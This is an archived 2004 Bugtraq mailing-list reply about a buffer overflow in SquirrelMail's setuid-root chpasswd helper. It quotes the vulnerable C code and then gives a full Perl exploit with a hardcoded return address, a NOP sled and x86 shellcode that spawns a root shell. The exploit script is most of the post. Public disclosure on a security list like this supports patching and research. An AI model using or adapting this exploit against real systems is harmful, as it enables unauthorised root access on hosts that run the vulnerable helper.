lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 19 Apr 2004 18:15:46 -0000
From: <rip@...rflow.no>
To: bugtraq@...urityfocus.com
Subject: Re: Squirrelmail Chpasswod bof


In-Reply-To: <20040417193848.GA31925@...er.madduck.net>

Hi
>> webmaster@...o:/mnt/hosting/hack/bof$ ./exploit 166 5555 99999
>
>can we please see the code for this exploit?

Certainly, but i admire your courage to ask for such a simple one tho :]
Let's take a quick peek at chpasswd.c:
<---snip--->
#define STR_MAX 100
#define MAXLEN 1024

/* in main, static, my favourite */
char User[STR_MAX];
char buf[MAXLEN];
char PUser[50];
char New_pw[50];
char Old_pw[50];

/* now let's up our privieledge without really needing it yet */
if((setuid(0)) < 0) eperror("setuid");
if((setgid(3)) < 0) eperror("setgid");

/* now let's hand over control to someone, heh */
sprintf(User,"%s",argv[1]);		/* heh */
sprintf(Old_pw,"%s",argv[2]);	/* heh */
sprintf(New_pw,"%s",argv[3]);         /* heh */

/* some humor */
if(!strcmp(User,"root")){
           printf("The %s user cannot be edited for security reasons.\n",User);
	return 4; //the root user cannot be edited for security reasons
}

/* ..  snip .. */
strcpy(PUser,User);	/* heh! */

/* we all see the problems here, no? */
<---snip--->
Some lame 5minute-code, should exploit the same thing Matias did:

<---begin--->
#!/usr/bin/perl -w
# i guess this ain't of much use unless you have a web-account 
# or something on the host, heh. this should be pretty selfexplanatory
# - rip
use strict;

my $ret = 0xbffff732;	           # ret, worked for me, prolly won't for you. change it.
my $length = 190;		# buffer length for smashing without ruining it
my $eipdist = 144;		# distance to overwrite eip
my $offset = 0;		# offset
my $numnops = 10;		# number of nops?
my $nop = "\x90";		# nop
my $pw = 'heh';		# random string, heh, 3 chars for current $ret

# dunno where this came from, it was just lying there.
my $shellcode =	"\x31\xd2\x52\x68\x6e\x2f\x73\x68".
			"\x68\x2f\x2f\x62\x69\x89\xe3\x52".
			"\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

sub generate_string($$$) {
	my ($r, $o, $len) = @_;
	my $buffer;
	my $i;

    my $new_ret = pack('l', ($r + $o));

    for($i = 0; $i < $eipdist; $i += 4) { $buffer .= $new_ret; }
    for($i = 0; $i < $numnops; ++$i) { $buffer .= $nop; }
    $buffer .= $shellcode;

    return $buffer;
}

if($ARGV[0]) { $offset = $ARGV[0]; }

print "[heh] moron.pl | rip\@overflow.no\n";
print "[heh] Address: 0x", sprintf('%lx', $ret), "\n[heh] Offset $offset\n";

my $evil = generate_string($ret, $offset ,$length);
exec('./chpasswd', $evil, $pw, $pw, 0);
<---end---->

- rip


Powered by blists - more mailing lists